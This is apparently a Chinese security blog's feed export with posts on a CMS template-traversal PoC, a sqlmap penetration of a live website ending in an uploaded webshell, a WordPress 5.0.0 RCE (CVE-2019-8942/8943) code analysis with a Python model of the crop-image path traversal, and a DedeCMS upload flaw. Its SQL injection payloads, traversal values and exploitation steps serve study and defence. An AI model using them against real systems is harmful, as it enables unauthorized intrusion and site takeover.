title="poc"></a>poc</h2><p>结合第一个漏洞获取后台账户密码后登入后台,然后更改模板文件(随意更改一个),初始目录是/cn/lib/,可以使用../进行目录穿越,在特定情况下还会造成目录暴露,例如修改cn/index.html文件.<br>最后在前台访问:10.10.10.132/install_pack/index.php?ac=Member&at=JsLogin&login_file=../index<br>即执行恶意代码.</p>]]></content>
<summary type="html">
<h1 id="前台SQL注入漏洞"><a href="#前台SQL注入漏洞" class="headerlink" title="前台SQL注入漏洞"></a>前台SQL注入漏洞</h1><h2 id="简介"><a href="#简介" class="headerlink"
</summary>
<category term="web安全" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/"/>
<category term="代码审计" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="代码审计" scheme="http://yoursite.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
</entry>
<entry>
<title>sqlmap and a real-world penetration test</title>
<link href="http://yoursite.com/2019/03/10/sqlmap%E4%B8%8E%E4%B8%80%E6%AC%A1%E6%B8%97%E9%80%8F%E5%AE%9E%E6%88%98/"/>
<id>http://yoursite.com/2019/03/10/sqlmap与一次渗透实战/</id>
<published>2019-03-10T15:22:37.000Z</published>
<updated>2019-03-10T15:57:04.577Z</updated>
<content type="html"><![CDATA[<h2 id="sqlmap简介"><a href="#sqlmap简介" class="headerlink" title="sqlmap简介"></a>sqlmap overview</h2><p>sqlmap is a penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities and the takeover of database servers. It has a powerful detection engine and a wide range of options for penetration testing against many kinds of databases, and it can retrieve data stored in the database, access files on the operating system, execute operating system commands, and so on.<br>A brief introduction to its options follows:</p><h3 id="请求"><a href="#请求" class="headerlink" title="请求"></a>Request</h3><table><thead><tr><th>Option</th><th style="text-align:center">Description</th></tr></thead><tbody><tr><td>--data=DATA</td><td style="text-align:center">#Data to send via POST </td></tr><tr><td>--cookie=COOKIE</td><td style="text-align:center">#Value of the Cookie header </td></tr><tr><td>--user-agent=AGENT</td><td style="text-align:center">#Specify the HTTP User-Agent header </td></tr><tr><td>--random-agent</td><td style="text-align:center">#Use a random User-Agent header </td></tr><tr><td>--tor</td><td style="text-align:center">#Use the Tor anonymity network</td></tr><tr><td>--proxy=IP</td><td style="text-align:center">#Set a proxy</td></tr><tr><td>--timeout</td><td style="text-align:center">#Timeout to wait for a response</td></tr></tbody></table><h3 id="获取数据"><a href="#获取数据" class="headerlink" title="获取数据"></a>Retrieving data</h3><table><thead><tr><th>Option</th><th style="text-align:center">Description</th></tr></thead><tbody><tr><td>-a</td><td style="text-align:center">#Retrieve everything </td></tr><tr><td>--users</td><td style="text-align:center">#Database user accounts </td></tr><tr><td>--passwords</td><td style="text-align:center">#Database account passwords </td></tr><tr><td>--is-dba</td><td style="text-align:center">#Whether the current user is root (DBA) </td></tr><tr><td>--dbs</td><td style="text-align:center">#Enumerate databases </td></tr><tr><td>--tables</td><td style="text-align:center">#Enumerate tables </td></tr><tr><td>--columns</td><td style="text-align:center">#Enumerate columns </td></tr><tr><td>--count</td><td style="text-align:center">#Retrieve the number of entries in a table </td></tr><tr><td>--dump</td><td style="text-align:center">#Dump table entries </td></tr><tr><td>--dump-all</td><td style="text-align:center">#Dump everything </td></tr></tbody></table><h3 id="操作系统"><a href="#操作系统" class="headerlink" title="操作系统"></a>Operating system</h3><table><thead><tr><th>Option</th><th style="text-align:center">Description</th></tr></thead><tbody><tr><td>--os-cmd=CMD</td><td style="text-align:center">#Execute a cmd command </td></tr><tr><td>--os-shell</td><td style="text-align:center">#Spawn a shell </td></tr><tr><td>--os-pwn</td><td style="text-align:center">#Get an OOB shell, Meterpreter or VNC, e.g. sqlmap -u xxx --os-pwn --msf-path /usr/share/metasploit-framework/ </td></tr><tr><td>--os-bof</td><td style="text-align:center">#Stored procedure buffer overflow </td></tr><tr><td>--priv-esc</td><td style="text-align:center">#Database process user privilege escalation </td></tr><tr><td>--reg-read</td><td style="text-align:center">#Read a registry key </td></tr><tr><td>--reg-add</td><td style="text-align:center">#Add a registry key </td></tr><tr><td>--reg-del</td><td style="text-align:center">#Delete a registry key </td></tr></tbody></table><p>Note: the --os options write a file-upload script to the target, then use that upload script to upload a shell, Meterpreter and so on, and change its permissions (when the PHP version is < 4.1.0).</p><h2 id="一次渗透"><a href="#一次渗透" class="headerlink" title="一次渗透"></a>A penetration test</h2><p>Penetration testing a certain website.</p><h3 id="前期信息搜集"><a href="#前期信息搜集" class="headerlink" title="前期信息搜集"></a>Initial information gathering</h3><p>Searching for the domain and IP address turned up no useful information.<br>Scanning the site's directories with Yujian (御剑) found no sensitive information:<br><img src="/2019/03/10/sqlmap与一次渗透实战/1.png" alt=""><br>No admin back end or robots.txt was found on the site either. </p>
<h3 id="发现sql注入"><a href="#发现sql注入" class="headerlink" title="发现sql注入"></a>Finding SQL injection</h3><p>But a SQL injection vulnerability was found on a query page:<br><img src="/2019/03/10/sqlmap与一次渗透实战/2.png" alt=""><br>Testing this point showed that commas were filtered; this can be bypassed with union select * from ((select 1)a JOIN (select 2)b JOIN (select 3)c). An attempt to write a file with "into outfile" did not succeed, so sqlmap was used for the penetration.<br>Command entered: sqlmap.py -u "<a href="http://www.xxxx.com/cj.php?code=1"" target="_blank" rel="noopener">http://www.xxxx.com/cj.php?code=1"</a>, which produced the following information:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">[15:38:05] [INFO] resuming back-end DBMS 'mysql'</span><br><span class="line">[15:38:05] [INFO] testing connection to the target URL</span><br><span class="line">sqlmap resumed the following injection point(s) from stored session:</span><br><span class="line">---</span><br><span class="line">Parameter: code (GET)</span><br><span class="line"> Type: boolean-based blind</span><br><span class="line"> Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)</span><br><span class="line"> Payload: code=1' OR NOT 9500=9500#</span><br><span class="line"></span><br><span class="line"> Type: error-based</span><br><span class="line"> Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)</span><br><span class="line"> Payload: code=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171716271,(SELECT (ELT(6682=6682,1))),0x716a6a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- MBii</span><br><span class="line"></span><br><span class="line"> Type: AND/OR time-based blind</span><br><span class="line"> Title: MySQL >= 5.0.12 OR time-based blind</span><br><span class="line"> Payload: code=1' OR SLEEP(5)-- KVCY</span><br><span class="line"></span><br><span class="line"> Type: UNION query</span><br><span class="line"> Title: MySQL UNION query (NULL) - 13 columns</span><br><span class="line"> Payload: code=1' UNION ALL SELECT NULL,NULL,CONCAT(0x7171716271,0x53415242557265476b6b777379697a4173616e47734c4c4b555a45534a6e614e476178754e634253,0x716a6a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#</span><br><span class="line">---</span><br><span class="line">[15:38:05] [INFO] the back-end DBMS is MySQL</span><br><span class="line">web server operating system: Windows 2003 or XP</span><br><span class="line">web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.33</span><br><span class="line">back-end DBMS: MySQL >= 5.5</span><br></pre></td></tr></table></figure></p><p>This shows that the SQL injection vulnerability is exploitable, and it also yielded system information, database information and so on.</p><h3 id="利用sql注入"><a href="#利用sql注入" class="headerlink" title="利用sql注入"></a>Exploiting the SQL injection</h3><p>Since the site's admin back end was unknown, even obtaining an account and password through the SQL injection vulnerability would not complete the task. However, we can use the vulnerability to write a file-upload script on the target server and then upload a webshell.<br>Command entered: sqlmap.py -u "<a href="http://www.xxx.com/cj.php?code=1"" target="_blank" rel="noopener">http://www.xxx.com/cj.php?code=1"</a> --os-cmd=ipconfig, then configure the options; since the path was unknown, Y was chosen to let sqlmap obtain the path automatically:<br><img src="/2019/03/10/sqlmap与一次渗透实战/3.png" alt=""><br>After execution you can see that sqlmap obtained the path and wrote two scripts: the first is the file-upload script and the second is a script that executes cmd commands. The second failed to execute, but our goal of writing the file-upload script was achieved.<br><img src="/2019/03/10/sqlmap与一次渗透实战/4.png" alt=""></p><h3 id="上传webshell完成渗透"><a href="#上传webshell完成渗透" class="headerlink" title="上传webshell完成渗透"></a>Uploading a webshell to complete the penetration</h3><p>Using the file-upload script tmpuugsd.php that sqlmap wrote earlier, a full-featured webshell was uploaded to the target<br><img src="/2019/03/10/sqlmap与一次渗透实战/5.png" alt=""><br>Finally, the webshell was used to complete the penetration task successfully. </p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>The key step in this penetration was using sqlmap to write a file-upload script; without understanding how the --os options work, it might not have been possible to finish the task quickly, so in day-to-day study pay attention to how the various tools work. Also, only after obtaining the webshell did I discover that the site's admin back end was admin + the site name!!! This shows that the information gathering was not thorough enough and the thinking not broad enough; something to improve on in the future.</p>]]></content>
<summary type="html">
<h2 id="sqlmap简介"><a href="#sqlmap简介" class="headerlink" title="sqlmap简介"></a>sqlmap简介</h2><p>sqlmap是一个渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="SQL注入" scheme="http://yoursite.com/tags/SQL%E6%B3%A8%E5%85%A5/"/>
</entry>
<entry>
<title>WordPress 5.0.0 remote code execution vulnerability analysis</title>
<link href="http://yoursite.com/2019/03/03/WordPress-5-0-0%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"/>
<id>http://yoursite.com/2019/03/03/WordPress-5-0-0远程代码执行漏洞分析/</id>
<published>2019-03-03T09:50:55.000Z</published>
<updated>2020-03-14T15:37:06.972Z</updated>
<content type="html"><![CDATA[<h1 id="wordpress-5-0-0-远程代码执行漏洞分析"><a href="#wordpress-5-0-0-远程代码执行漏洞分析" class="headerlink" title="wordpress 5.0.0 远程代码执行漏洞分析"></a>WordPress 5.0.0 remote code execution vulnerability analysis</h1><h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Overview</h2><p>The WordPress 5.0.0 remote code execution vulnerability was disclosed by RIPS on February 19; blog post: <a href="https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/" target="_blank" rel="noopener">https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/</a>.<br>It was assigned CVE-2019-8942 and CVE-2019-8943, and the affected versions are WordPress before 4.9.9 and 5.x before 5.0.1. </p><h2 id="postmeta覆盖"><a href="#postmeta覆盖" class="headerlink" title="postmeta覆盖"></a>Post meta overwrite</h2><p>When a post is edited, the following code in wp-admin/post.php is called:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">case 'editpost':</span><br><span class="line">check_admin_referer('update-post_' . $post_id);</span><br><span class="line"></span><br><span class="line">$post_id = edit_post();</span><br><span class="line"></span><br><span class="line">// Session cookie flag that the post was saved</span><br><span class="line">if ( isset( $_COOKIE['wp-saving-post'] ) && $_COOKIE['wp-saving-post'] === $post_id . '-check' ) {</span><br><span class="line">setcookie( 'wp-saving-post', $post_id . '-saved', time() + DAY_IN_SECONDS, ADMIN_COOKIE_PATH, COOKIE_DOMAIN, is_ssl() );</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">redirect_post($post_id); // Send user on their way while we keep working</span><br><span class="line"></span><br><span class="line">exit();</span><br></pre></td></tr></table></figure></p>
<p>And the edit_post() function is:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">function edit_post( $post_data = null ) {</span><br><span class="line">global $wpdb;</span><br><span class="line"></span><br><span class="line">if ( empty($post_data) )</span><br><span class="line">$post_data = &$_POST;</span><br><span class="line"></span><br><span class="line">// Clear out any data in internal vars.</span><br><span class="line">unset( $post_data['filter'] );</span><br><span class="line"></span><br><span class="line">$post_ID = (int) $post_data['post_ID'];</span><br><span class="line">$post = get_post( $post_ID );</span><br><span class="line">$post_data['post_type'] = $post->post_type;</span><br><span class="line">$post_data['post_mime_type'] = $post->post_mime_type;</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">$success = wp_update_post( $post_data ); // vulnerable point</span><br><span class="line">// If the save failed, see if we can sanity check the main fields and try again</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line">return $post_ID;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>This code assigns the data received via POST to $post_data, and $post_data is then passed into wp_update_post(), whose code is as follows:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">function wp_update_post( $postarr = array(), $wp_error = false ) {</span><br><span class="line">if ( is_object($postarr) ) {</span><br><span class="line">// Non-escaped post was passed.</span><br><span class="line">$postarr = get_object_vars($postarr);</span><br><span class="line">$postarr = wp_slash($postarr);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">// First, get all of the original fields.</span><br><span class="line">$post = get_post($postarr['ID'], ARRAY_A);</span><br><span class="line"></span><br><span class="line">if ( is_null( $post ) ) {</span><br><span class="line">if ( $wp_error )</span><br><span class="line">return new WP_Error( 'invalid_post', __( 'Invalid post ID.' ) );</span><br><span class="line">return 0;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">// Escape data pulled from DB.</span><br><span class="line">$post = wp_slash($post);</span><br><span class="line"></span><br><span class="line">// Passed post category list overwrites existing category list if not empty.</span><br><span class="line">if ( isset($postarr['post_category']) && is_array($postarr['post_category'])</span><br><span class="line"> && 0 != count($postarr['post_category']) )</span><br><span class="line">$post_cats = $postarr['post_category'];</span><br><span class="line">else</span><br><span class="line">$post_cats = $post['post_category'];</span><br><span class="line"></span><br><span class="line">// Drafts shouldn't be assigned a date unless explicitly done so by the user.</span><br><span class="line">if ( isset( $post['post_status'] ) && in_array($post['post_status'], array('draft', 'pending', 'auto-draft')) && empty($postarr['edit_date']) &&</span><br><span class="line"> ('0000-00-00 00:00:00' == $post['post_date_gmt']) )</span><br><span class="line">$clear_date = true;</span><br><span class="line">else</span><br><span class="line">$clear_date = false;</span><br><span class="line"></span><br><span class="line">// Merge old and new fields with new fields overwriting old ones.</span><br><span class="line">$postarr = array_merge($post, $postarr);</span><br><span class="line">$postarr['post_category'] = $post_cats;</span><br><span class="line">if ( $clear_date ) {</span><br><span class="line">$postarr['post_date'] = current_time('mysql');</span><br><span class="line">$postarr['post_date_gmt'] = '';</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">if ($postarr['post_type'] == 'attachment')</span><br><span class="line">return wp_insert_attachment($postarr);</span><br><span class="line"></span><br><span class="line">return wp_insert_post( $postarr, $wp_error ); // vulnerable point</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>At the end of the function, the value of $postarr is passed into wp_insert_post(), which contains the following code:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">if ( ! 
empty( $postarr['meta_input'] ) ) {</span><br><span class="line">foreach ( $postarr['meta_input'] as $field => $value ) {</span><br><span class="line">update_post_meta( $post_ID, $field, $value ); //漏洞点</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>该处会将meta_input参数取出,调用updata_post_meta()最后修改wp_postmeta表.</p><h2 id="目录遍历"><a href="#目录遍历" class="headerlink" title="目录遍历"></a>目录遍历</h2><p>目录遍历时需要前面修改的postmeta表中的_wp_attached_file字段的值,在wp-admin/includes/ajax-actions.php的wp_ajax_crop_image()函数中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$cropped = wp_crop_image( $attachment_id, $data['x1'], $data['y1'], $data['width'], $data['height'], $data['dst_width'], $data['dst_height'] );</span><br></pre></td></tr></table></figure></p><p>此处调用wp_crop_image()函数,而该函数中有:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$src_file = get_attached_file( $src );</span><br></pre></td></tr></table></figure></p><p>该处获取postmeta表中_wp_attached_file的值,然后赋给$src_filez,之后检查是否存在该文件,不存在的话调用_load_image_edit_path()函数,该函数:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">function 
_load_image_to_edit_path( $attachment_id, $size = 'full' ) {</span><br><span class="line">$filepath = get_attached_file( $attachment_id );</span><br><span class="line"></span><br><span class="line">if ( $filepath && file_exists( $filepath ) ) {</span><br><span class="line">if ( 'full' != $size && ( $data = image_get_intermediate_size( $attachment_id, $size ) ) ) {</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$filepath = apply_filters( 'load_image_to_edit_filesystempath', path_join( dirname( $filepath ), $data['file'] ), $attachment_id, $size );</span><br><span class="line">}</span><br><span class="line">} elseif ( function_exists( 'fopen' ) && true == ini_get( 'allow_url_fopen' ) ) {</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$filepath = apply_filters( 'load_image_to_edit_attachmenturl', wp_get_attachment_url( $attachment_id ), $attachment_id, $size );</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">return apply_filters( 'load_image_to_edit_path', $filepath, $attachment_id, $size );</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>调用wp_get_attachment_url()后会生成一个url链接,所以如果meta_value被改为2019/03/1.jpg?/../../../1.jpg时生成的url是:<a href="http://127.0.0.1/wp-content/uploads/2019/03/1.jpg?/../../../1.jpg" target="_blank" rel="noopener">http://127.0.0.1/wp-content/uploads/2019/03/1.jpg?/../../../1.jpg</a> ,<br>这个url会一直返回到wp_crop_image()函数中,该函数中有:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$editor = wp_get_image_editor( $src );</span><br></pre></td></tr></table></figure></p><p>此处将url传入 wp_get_image_editor()函数中进行处理,该函数如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">function wp_get_image_editor( $path, $args = array() ) {</span><br><span class="line">$args['path'] = $path;</span><br><span class="line"></span><br><span class="line">if ( ! isset( $args['mime_type'] ) ) {</span><br><span class="line">$file_info = wp_check_filetype( $args['path'] );</span><br><span class="line"></span><br><span class="line">// If $file_info['type'] is false, then we let the editor attempt to</span><br><span class="line">// figure out the file type, rather than forcing a failure based on extension.</span><br><span class="line">if ( isset( $file_info ) && $file_info['type'] )</span><br><span class="line">$args['mime_type'] = $file_info['type'];</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$implementation = _wp_image_editor_choose( $args ); </span><br><span class="line"></span><br><span class="line">if ( $implementation ) {</span><br><span class="line">$editor = new $implementation( $path );</span><br><span class="line">$loaded = $editor->load();</span><br><span class="line"></span><br><span class="line">if ( is_wp_error( $loaded ) )</span><br><span class="line">return $loaded;</span><br><span 
class="line"></span><br><span class="line">return $editor;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">return new WP_Error( 'image_no_editor', __('No editor could be selected.') );</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>最后依然会返回路径,然后在wp_crop_image()函数中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$result = $editor->save( $dst_file );</span><br></pre></td></tr></table></figure></p><p>图片会被保存到该路径,因此可以进行目录遍历。将图片保存到主题目录下可以通过包含执行恶意代码。</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这个漏洞分析了好几天,思路非常清奇,涉及的函数比较多,而我安装在本地的wordpress与Xdebug会发生冲突,因此不能用phpstorm进行动态分析,这个问题还在解决中。通过这个漏洞的分析,我学习到:<br>数据库中存储的文件数据在存入取出过程中可能会产生漏洞,今后要多加关注。</p>]]></content>
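To make the chain above concrete, the following is an added Python model written for this page (it is not WordPress code). It mirrors three steps: get_attached_file() joining the stored _wp_attached_file value onto the uploads directory; the fallback in wp_crop_image() to _load_image_to_edit_path(), which hands the editor the attachment URL when the local path does not exist (the web server treats everything after the ? as a query string and returns the real image); and wp_crop_image() deriving $dst_file from the tainted local $src_file with str_replace(basename($src_file), 'cropped-' . basename($src_file), $src_file), after which wp_mkdir_p() and the editor's save resolve the ../ components. The install path, the upload URL, the set of files on disk and the theme directory name are assumptions made for the example, the wp_unique_filename() rename is left out, and the containment check at the end is an illustrative mitigation rather than the upstream patch.

```python
import posixpath

# Constructed layout for the example (assumed paths, not taken from the post).
WP_CONTENT = "/var/www/html/wp-content"
UPLOADS_DIR = WP_CONTENT + "/uploads"
UPLOADS_URL = "http://127.0.0.1/wp-content/uploads"

# Files we pretend exist on disk. In the real chain the image is fetched over
# HTTP; here the "web server" answers from this constructed set.
EXISTING_FILES = {UPLOADS_DIR + "/2019/03/1.jpg"}


def get_attached_file(attached_file):
    """Model of get_attached_file(): the stored _wp_attached_file value is
    joined onto the uploads basedir without any normalisation."""
    return UPLOADS_DIR + "/" + attached_file


def load_image_to_edit_path(attached_file):
    """Model of the fallback in wp_crop_image(): if the local path does not
    exist, _load_image_to_edit_path() hands the editor the attachment URL."""
    local = get_attached_file(attached_file)
    if local in EXISTING_FILES:
        return local
    return UPLOADS_URL + "/" + attached_file


def webserver_can_serve(url):
    """The HTTP server splits the request at '?', so the traversal tail is an
    ignored query string and the real image is served."""
    path_only = url.split("?", 1)[0]
    return path_only.replace(UPLOADS_URL, UPLOADS_DIR, 1) in EXISTING_FILES


def crop_destination(attached_file):
    """Model of wp_crop_image(): the editor loads from $src (URL fallback), but
    $dst_file is derived from the tainted local $src_file. Returns the path the
    filesystem resolves when the editor saves, or None if the load would fail."""
    src_file = get_attached_file(attached_file)
    src = load_image_to_edit_path(attached_file)
    if src != src_file and not webserver_can_serve(src):
        return None  # wp_get_image_editor() would return a WP_Error here
    base = posixpath.basename(src_file)
    # PHP str_replace() replaces every occurrence, and so does str.replace().
    dst_file = src_file.replace(base, "cropped-" + base)
    # wp_mkdir_p(dirname($dst_file)) creates the "cropped-1.jpg?" directory, after
    # which the kernel resolves the ../ components on save; normpath models that.
    return posixpath.normpath(dst_file)


def destination_is_contained(dst_file, basedir=UPLOADS_DIR):
    """Illustrative containment check (not WordPress's own fix): refuse any
    destination whose normalised form leaves the uploads directory."""
    return posixpath.normpath(dst_file).startswith(basedir + "/")


if __name__ == "__main__":
    for value in ("2019/03/1.jpg",
                  "2019/03/1.jpg?/../../../1.jpg",
                  "2019/03/1.jpg?/../../../../themes/twentynineteen/1.jpg"):
        dst = crop_destination(value)
        print(value, "->", dst, "contained:", destination_is_contained(dst))
```

With the post's own value, 2019/03/1.jpg?/../../../1.jpg, the cropped copy resolves three levels up from the directory wp_mkdir_p() creates, i.e. into the uploads root; one more ../ followed by themes/.../ puts it in a theme directory, which is the case the post describes.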
<summary type="html">
<h1 id="wordpress-5-0-0-远程代码执行漏洞分析"><a href="#wordpress-5-0-0-远程代码执行漏洞分析" class="headerlink" title="WordPress 5.0.0 remote code execution vulnerability analysis"></a>wordpres
</summary>
<category term="web security" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/"/>
<category term="code audit" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="code audit" scheme="http://yoursite.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
</entry>
<entry>
<title>DedeCMS v5.7 SP2 file upload vulnerability [CVE-2019-8362]</title>
<link href="http://yoursite.com/2019/02/16/dedecms%20v5.7%20sp2%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/"/>
<id>http://yoursite.com/2019/02/16/dedecms v5.7 sp2文件上传漏洞/</id>
<published>2019-02-16T15:15:50.000Z</published>
<updated>2020-03-14T15:36:53.164Z</updated>
<content type="html"><![CDATA[<h2 id="简介"><a href="#简介" class="headerlink" title="Introduction"></a>Introduction</h2><p>DedeCMS (织梦内容管理系统) is one of the best-known open-source PHP content management systems in China and one of the most widely deployed. Over years of development it has targeted individual webmasters, with features focused on building personal sites and small to medium portals, although businesses and schools use it as well.</p><h2 id="原理分析"><a href="#原理分析" class="headerlink" title="Root cause"></a>Root cause</h2><p>The vulnerable code is in dede/album_edit.php and dede/album_add.php, both part of the authenticated backend:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"> /*---------------------</span><br><span class="line"> function _getformzip()</span><br><span class="line"> Get new images from a ZIP file</span><br><span class="line"> ---------------------*/</span><br><span class="line">if($formzip==1)</span><br><span class="line"> {</span><br><span class="line"> include_once(DEDEINC."/zip.class.php");</span><br><span class="line"> include_once(DEDEADMIN."/file_class.php");</span><br><span class="line"> $zipfile = $cfg_basedir.str_replace($cfg_mainsite,'',$zipfile);</span><br><span class="line"> $tmpzipdir = DEDEDATA.'/ziptmp/'.cn_substr(md5(ExecTime()),16);</span><br><span class="line"> $ntime = time();</span><br><span class="line"> if(file_exists($zipfile))</span><br><span class="line"> {</span><br><span class="line"></span><br><span class="line"> @mkdir($tmpzipdir,$GLOBALS['cfg_dir_purview']);</span><br><span class="line"> @chmod($tmpzipdir,$GLOBALS['cfg_dir_purview']);</span><br><span class="line"> $z = new zip();</span><br><span class="line"> $z->ExtractAll($zipfile,$tmpzipdir);</span><br><span class="line"> $fm = new FileManagement();</span><br><span class="line"> $imgs = array();</span><br><span class="line"> $fm->GetMatchFiles($tmpzipdir,"jpg|png|gif",$imgs);</span><br><span class="line"> $i = 0;</span><br><span class="line"> foreach($imgs as $imgold)</span><br><span class="line"> {</span><br><span class="line"> $i++;</span><br><span class="line"> $savepath = $cfg_image_dir."/".MyDate("Y-m",$ntime);</span><br><span class="line"> CreateDir($savepath);</span><br><span class="line"> $iurl = $savepath."/".MyDate("d",$ntime).dd2char(MyDate("His",$ntime).'-'.$adminid."-{$i}".mt_rand(1000,9999));</span><br><span class="line"> $iurl = $iurl.substr($imgold,-4,4); // suffix = last four characters of the original name</span><br><span class="line"> $imgfile = $cfg_basedir.$iurl;</span><br><span class="line"> copy($imgold,$imgfile);</span><br><span class="line"> unlink($imgold);</span><br><span class="line"> if(is_file($imgfile))</span><br><span class="line"> {</span><br><span class="line"> $litpicname = $pagestyle > 2 ? GetImageMapDD($iurl,$cfg_ddimg_width) : $iurl;</span><br><span class="line"> $info = '';</span><br><span class="line"> $imginfos = GetImageSize($imgfile,$info);</span><br><span class="line"> $imgurls .= "{dede:img ddimg='$litpicname' text='' width='".$imginfos[0]."' height='".$imginfos[1]."'} $iurl {/dede:img}\r\n";</span><br><span class="line"></span><br><span class="line"> // save the image record in the media library</span><br><span class="line"> $inquery = "</span><br><span class="line"> INSERT INTO #@__uploads(title,url,mediatype,width,height,playtime,filesize,uptime,mid)</span><br><span class="line"> VALUES ('{$title}','{$iurl}','1','".$imginfos[0]."','".$imginfos[1]."','0','".filesize($imgfile)."','".$ntime."','$adminid');</span><br><span class="line"> ";</span><br><span class="line"> $dsql->ExecuteNoneQuery($inquery);</span><br><span class="line"> if(!$hasone && $ddisfirst==1</span><br><span class="line"> && $litpic=="" && !empty($litpicname))</span><br><span class="line"> {</span><br><span class="line"> if( file_exists($cfg_basedir.$litpicname) )</span><br><span class="line"> {</span><br><span class="line"> $litpic = $litpicname;</span><br><span class="line"> $hasone = true;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> if($delzip==1)</span><br><span class="line"> {</span><br><span class="line"> unlink($zipfile);</span><br><span class="line"> }</span><br><span class="line"> $fm->RmDirFiles($tmpzipdir);</span><br><span class="line"> }</span><br><span class="line"> }</span><br></pre></td></tr></table></figure></p><p>This block extracts images from an uploaded ZIP archive. GetMatchFiles() collects the files that match the allowed extensions (jpg, png and gif, from the argument passed in).<br>Following GetMatchFiles():<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">function GetMatchFiles($indir, $fileexp, &$filearr)</span><br><span class="line">{</span><br><span class="line"> $dh = dir($indir);</span><br><span class="line"> while($filename = $dh->read())</span><br><span class="line"> {</span><br><span class="line"> $truefile = $indir.'/'.$filename;</span><br><span class="line"> if($filename == "." || $filename == "..")</span><br><span class="line"> {</span><br><span class="line"> continue;</span><br><span class="line"> }</span><br><span class="line"> else if(is_dir($truefile))</span><br><span class="line"> {</span><br><span class="line"> $this->GetMatchFiles($truefile, $fileexp, $filearr);</span><br><span class="line"> }</span><br><span class="line"> else if(preg_match("/\.(".$fileexp.")/i",$filename))</span><br><span class="line"> {</span><br><span class="line"> $filearr[] = $truefile;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> $dh->close();</span><br><span 